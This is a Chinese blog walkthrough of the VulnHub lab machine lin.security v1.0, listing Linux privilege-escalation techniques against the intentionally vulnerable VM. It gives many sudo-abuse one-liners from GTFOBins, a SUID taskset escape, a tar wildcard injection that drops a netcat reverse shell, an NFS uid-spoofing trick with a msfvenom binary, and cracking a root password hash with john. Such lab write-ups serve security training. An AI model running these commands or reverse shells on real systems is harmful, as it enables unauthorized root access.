vulnhub系列:lin.security_v1.0靶机

已于 2024-07-31 10:38:55 修改
阅读量256 收藏 4
点赞数 3
分类专栏: vulnhub系列 文章标签: web安全 网络安全
于 2024-07-30 21:35:49 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jq_j37/article/details/140807362
版权

lin.security_v1.0靶机

靶机下载

账号密码

bob:secret

登录查看靶机ip

image-20240728130220588

ssh连接靶机

ssh bob@192.168.23.166

01

查看一下当前用户和权限

02

内核版本不适用脏牛

03

sudo提权

查看支持root权限的命令

sudo -l

04

利用辅助网站参考搜索,根据结果执行对应命令提权

https://gtfobins.github.io/

ash

sudo ash

05

awk

sudo awk 'BEGIN {system("/bin/sh")}'

06

bash

sudo bash

07

csh

sudo csh

01

dash

sudo dash

02

ed

sudo ed

!/bin/sh

03

env

sudo env /bin/sh

04

expect

sudo expect -c 'spawn /bin/sh;interact'

05

find

sudo find . -exec /bin/sh \; -quit

06

ftp

sudo ftp

!/bin/sh

07

man

sudo man man

!/bin/sh

08

more

TERM= sudo more /etc/profile

!/bin/sh

09

scp

TF=$(mktemp)
echo 'sh 0<&2 1>&2' > $TF
chmod +x "$TF"
sudo scp -S $TF x y:

10

socat

sudo socat stdin exec:/bin/sh

11

ssh

sudo ssh -o ProxyCommand=';sh 0<&2 1>&2' x

12

vi

sudo vi -c ':!/bin/sh' /dev/null

13

zsh

sudo zsh

14

perl

sudo perl -e 'exec "/bin/sh";'

15

tclsh

sudo tclsh
exec /bin/sh <@stdin >@stdout 2>@stderr

16

script

sudo script -q /dev/null

17

scp

TF=$(mktemp)
echo 'sh 0<&2 1>&2' > $TF
chmod +x "$TF"
sudo scp -S $TF x y:

18

suid提权

查看suid文件

find / -perm -u=s -type f 2>/dev/null

08

同样使用辅助网站进行查询,根据查询结果执行对应命令

https://gtfobins.github.io/

taskset

taskset 1 /bin/bash -p

09

计划任务提权

查看计划任务

cat /etc/crontab

10

直接写入没有权限

kali生成payload

msfvenom -p cmd/unix/reverse_netcat lhost=192.168.23.166 lport=9999 R

06

mkfifo /tmp/jeuhde; nc 192.168.23.166 9999 0</tmp/jeuhde | /bin/sh >/tmp/jeuhde 2>&1; rm /tmp/jeuhde

靶机执行命令

echo "mkfifo /tmp/jeuhde; nc 192.168.23.166 9999 0</tmp/jeuhde | /bin/sh >/tmp/jeuhde 2>&1; rm /tmp/jeuhde" > shell.sh && chmod +x shell.sh

echo > "--checkpoint-action=exec=sh shell.sh"

echo > "--checkpoint=1"

07

NFS提权

查看是否开启NFS

cat /etc/exports

01

查看可以访问的NFS目录

showmount -e 192.168.23.166

02

创建nfs目录用来挂载

mkdir /tmp/nfs

挂载目录到/tmp/nfs

mount -o rw,vers=3 192.168.23.166:/home/peter /tmp/nfs

03

生成恶意文件

msfvenom -p linux/x86/exec CMD="/bin/bash -p" -f elf -o /tmp/nfs/shell.elf

发现没有写入权限,创建一个gid为1005的用户组,然后创建peter账户,uid指定为1001,gid指定为1005

04

切换到peter用户,再次执行

05

靶机执行文件,但是没提到权限

不安全配置

passwd

查看/etc/passwd文件

cat /etc/passwd

发现有一个root权限的用户存在加密的密码

08

将密码写入1.txt文件中,利用john进行解密

sudo john --wordlist=rockyou.txt 1.txt

密码

P@ssw0rd

09

进行登录

10

三天三夜睡不着
关注
  • 3
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Vulnhub靶机系列:De-ICE: S1.120
01-09
靶机默认ip是192.168.1.120,最好设一个对应网段的网卡给它,我的这篇文章有简单指导Vulnhub靶机系列:pWnOS: 2.0另外iso文件如何导入就不赘述了,安装完最好重启一下。完成上述步骤后可以netdiscover一下确定。 利用...
Vulnhub lin security靶机.pdf
07-29
Vulnhub lin security靶机.pdf
vulnhublin.security_v1.0
li1136594919的博客
06-03 204
下载靶机的时候没看描述,开启靶机直接盲打。直接开局四部曲--开放端口扫描,开放端口服务扫描,nmap简单漏洞脚本扫描,发现nfs服务开启,立即showmount -e 看有哪些共享目录在kali创建temp目录把靶机共享目录挂载上去,进去啥有效信息也没得,也不能写入文件。然后退出一直找啊找啊也没找到,最终承认自己是个菜逼,到网上搜靶机的writeup才发现作者已经给了初始立足点,这是一台练习提权的靶机!!!!!!!初始立足点:bob/secret。
[VulnHub靶机]Lin.Security_linux提权
qq_45927819的博客
03-15 2200
靶机描述 在in.security,我们希望开发一个Linux虚拟机,该虚拟机在编写本文时基于最新的Ubuntu发行版(18.04 LTS),但存在许多漏洞,这些漏洞使用户无法升级扎根在盒子上。旨在帮助理解某些内置应用程序和服务(如果配置错误)可能会被攻击者滥用。 首先,您可以使用以下凭据登录主机:bob / secret 下载地址:https://in.security/downloads/lin.security_v1.0.ova 靶机IP:192.168.56.106 直接ssh连接: ssh bob
lin.security_v1.0靶机
weixin_58786230的博客
07-28 244
【代码】lin.security_v1.0靶机
lin.security_1.0靶机
最新发布
m0_61995767的博客
07-29 391
lin.security_1.0靶机打靶记录
Vulnhub靶机 Lin.security
菜浪马废的博客
04-27 250
给了登录账号 直接拿靶机登录 第一种方法 第二种方法
靶机渗透练习90-Grotesque:1.0.1
hirak0的博客
05-02 2846
靶机描述 靶机地址:https://www.vulnhub.com/entry/grotesque-101,658/ Description get flags difficulty: medium about vm: tested and exported from virtualbox. dhcp and nested vtx/amdv enabled. you can contact me by email for troubleshooting or questions. This works
安全vulnhub实验ica1
qq_43017750的博客
12-22 3627
查看当前网卡ip ┌──(kali㉿kali)-[~] └─$ ifconfig eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500 inet 192.168.56.102 netmask 255.255.255.0 broadcast 192.168.56.255 inet6 fe80::20c:29ff:feea:9e42 prefixlen 64 scopeid 0x20<lin
Linux常用提权方法 (゚益゚メ) 渗透测试
寻觅的博客
03-30 3158
文章目录简介常用命令汇总Linux环境变量简述 简介 进行linux提权前最好对Linux信息收集、渗透测试常用命令有所了解。 常用命令汇总 这里简单在提一下常用命令 命令 作用 uname -a 查看系统所有信息 ifconfig -a 查看所有网络信息 ps aux或ps -elf 查看进程信息 id 或 who 或 w 或 last 查看用户信息 crontab -l 查看当前用户的计划任务 Linux环境变量简述 ...
一份完整指南:如何在 Linux 中使用 “sudo“ 命令提权?
A485860941的博客
06-23 826
当我们需要进行重要和敏感 Linux 系统操作时,我们通常使用 sudo 命令来获取特权级,以便在不离开当前帐户的情况下执行操作。然而,如果我们不小心使用了供应商提供的软件或未知源下载的软件,那么可能会存在安全隐患,使黑客可以利用此种行为来操纵 Linux 系统并获取比普通用户更高的权限。因此,本文将介绍如何在 Linux 中使用sudo提高系统安全性,并防止潜在的安全漏洞,提供系统管理员对 Linux 系统进行更加有效的管理。
MyOA.rar_easy _myoa_myoa靶机_oa_ssh mysql 框架
09-24
【标题】"MyOA.rar_easy_myoa_myoa靶机_oa_ssh mysql 框架" 描述了一个基于SSH框架和MySQL数据库的在线办公(OA)系统,名为MyOA,并且它具有一个易于使用的前端界面——Easy UI。这个项目可能用于企业内部的自动化...
VulnHub 靶机系列实战教程.pdf
07-22
VulnHub 靶机系列实战教程.pdf
Vulnhub靶机系列:Kioptrix: Level 1.2 (#3)
01-09
这次的靶机Vulnhub靶机:Kioptrix: Level 1.2 (#3) 文章目录靶机地址及相关描述靶机设置利用知识及工具信息收集并getshell提权总结 靶机地址及相关描述 https://www.vulnhub.com/entry/kioptrix-level-12-3,24/ ...
网络安全之扫描探测阶段攻防手段(二)
子非渔
07-24 750
扫描探测阶段是攻击者对目标网络进行深入了解的关键步骤,同时也是防御者识别潜在威胁和加强安全防护的机会。
网络安全相关竞赛比赛
黑战士的博客
07-18 1411
湖南省委网信办联合省教育厅、省广播电视局、省政务管理服务局、省通信管理局、长沙市人民政府等6家单位共同主办。教育部认可的大学生学科竞赛网站链接(2023版)关键字:比赛、CTF、赛事、技能挑战。浙江省大学生网络与信息安全竞赛。全国网络安全行业职业技能大赛。湖南省“网安湘军杯”
网络安全防御【IPsec VPN搭建】
miss_copper的博客
07-25 1258
防火墙的g0/0/0口默认的IP地址为192.168.0.1/24;但是我们需要在浏览器中打开FW2的web服务就需要将g0/0/0接口的IP地址修改为192.168.142.40/24与我们Clound中虚拟网卡通一个网段才行。20、将双机热备改成主备模式,通过内网的VPN设备构建一条到达分公司的IPsec VPN通道,保证10.0.2.0/24网段可以访问到192.168.1.0/24网段。登录成功之后需要修改你的密码才能进入防火墙的用户视图。IPsec策略协商成功!成功修改为主备模式!
网络安全之不同阶段攻防手段(四)
子非渔
07-25 474
前面已经说过信息收集、扫描探测以及初始访问阶段的攻防手段,下面将说一下在攻击者获取到访问权限的情况下会接着如何进一步在网络中建立控制点、提权、横移以及完成攻击后的遗迹隐藏
vulnhub靶机系列
09-09
你好!关于Vulnhub靶机系列,我可以提供一些信息。Vulnhub是一个开放的漏洞测试平台,提供了一系列用于学习和实践渗透测试的虚拟机。这些虚拟机包含了各种不同的漏洞,供安全爱好者和专业人员练习渗透测试技巧。 Vulnhub上有许多靶机系列,每个系列都包含了多个不同难度级别的虚拟机。通过解决这些靶机,你可以学习到渗透测试中常见的攻击技术和漏洞利用方法。 一些著名的Vulnhub靶机系列包括: 1. Kioptrix:这是一个非常受欢迎的系列,包含了多个不同难度级别的靶机。从初级到高级的挑战,覆盖了各种网络安全知识。 2. Metasploitable:这个系列模拟了一个容易受到攻击的系统,用于学习Metasploit框架和漏洞利用。 3. SickOS:这个系列提供了一些有趣的靶机,涵盖了各种不同类型的漏洞。 4. HackTheBox:虽然HackTheBox不是Vulnhub上的系列,但它也是一个非常受欢迎的漏洞测试平台,提供了一系列具有挑战性的靶机。 这些靶机系列都可以帮助你锻炼渗透测试技能,并提供了一个实践环境来深入了解网络安全和漏洞利用的原理。希望这些信息能帮到你!如果你还有其他问题,请随时提问。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值